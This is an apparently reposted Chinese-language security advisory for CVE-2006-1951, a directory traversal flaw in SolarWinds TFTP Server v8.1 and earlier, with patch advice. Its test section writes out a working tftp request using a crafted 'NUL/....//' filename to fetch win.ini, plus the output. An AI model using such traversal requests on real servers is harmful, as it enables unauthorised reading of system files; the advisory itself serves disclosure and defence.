2021-03-25 11:43:03
受影响系统: SolarWinds TFTP Server <= v8.1 不受影响系统: SolarWinds TFTP Server v8.2 描述: BUGTRAQ ID: 17648 CVE(CAN) ID: CVE-2006-1951 SolarWinds TFTP服务程序可以同时发送和接收多个文件,常用于下载/上传路由器、交换机等可执行映象和配置文件。 TFTP Server对大多数类似于“../filename”的请求文件名都会进行过滤,但可通过控制文件名来绕过过滤,然后下载系统上的任意文件。 <*来源:Rapid7 链接:http://www.rapid7.com/advisories/R7-0019.html *> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! $ tftp 192.168.0.1 tftp> get NUL/....//....//WINNT/win.ini Received 582 bytes in 0.0 seconds tftp> quit $ cat win.ini ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 建议: 厂商补丁: SolarWinds 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: solarwinds
上一篇:tftp 上传文件,Ignite-UX的TFTP在处理文件路径时存在漏洞
下一篇:没有了
